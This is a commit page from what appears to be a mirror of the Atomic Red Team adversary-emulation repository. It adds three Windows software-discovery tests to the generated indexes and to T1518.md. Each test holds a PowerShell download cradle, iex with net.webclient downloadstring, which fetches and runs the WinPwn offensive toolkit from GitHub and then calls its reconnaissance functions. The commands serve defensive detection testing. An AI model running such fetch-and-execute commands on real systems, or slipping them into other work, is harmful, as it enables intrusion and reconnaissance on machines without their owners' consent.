security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-05-08 02:04:19 +00:00
parent e39bbd9a3d
commit 5289ef6887
6 changed files with 144 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+3
View File
@@ -969,6 +969,9 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
969 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
970 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
971 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
972 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
973 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
974 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
975 discovery T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
976 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
977 discovery T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
atomics/Indexes/Indexes-CSV/windows-index.csv
+3
View File
@@ -675,6 +675,9 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
675 discovery T1518.001 Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
676 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
677 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
678 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
679 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
680 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
681 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
682 discovery T1497.001 System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
683 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+3
View File
@@ -1503,6 +1503,9 @@
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+3
View File
@@ -1086,6 +1086,9 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
atomics/Indexes/index.yaml
+36 -1
View File
@@ -61901,9 +61901,44 @@ discovery:
executor:
name: sh
elevation_required: false
command: |-
command: |
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
- name: WinPwn - Dotnetsearch
auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
description: Search for any .NET binary file in a share using the Dotnetsearch
function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
name: powershell
- name: WinPwn - DotNet
auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
description: Search for .NET Service-Binaries on this system via winpwn dotnet
function of WinPwn.
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
name: powershell
- name: WinPwn - powerSQL
auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
description: Start PowerUpSQL Checks using powerSQL function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
name: powershell
T1497.001:
technique:
type: attack-pattern
atomics/T1518/T1518.md
+96
View File
@@ -12,6 +12,12 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
- [Atomic Test #3 - Find and Display Safari Browser Version](#atomic-test-3---find-and-display-safari-browser-version)
- [Atomic Test #4 - WinPwn - Dotnetsearch](#atomic-test-4---winpwn---dotnetsearch)
- [Atomic Test #5 - WinPwn - DotNet](#atomic-test-5---winpwn---dotnet)
- [Atomic Test #6 - WinPwn - powerSQL](#atomic-test-6---winpwn---powersql)
<br/>
@@ -100,4 +106,94 @@ Adversaries may attempt to get a listing of non-security related software that i
<br/>
<br/>
## Atomic Test #4 - WinPwn - Dotnetsearch
Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 7e79a1b6-519e-433c-ad55-3ff293667101
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #5 - WinPwn - DotNet
Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
**Supported Platforms:** Windows
**auto_generated_guid:** 10ba02d0-ab76-4f80-940d-451633f24c5b
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #6 - WinPwn - powerSQL
Start PowerUpSQL Checks using powerSQL function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 0bb64470-582a-4155-bde2-d6003a95ed34
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
```
<br/>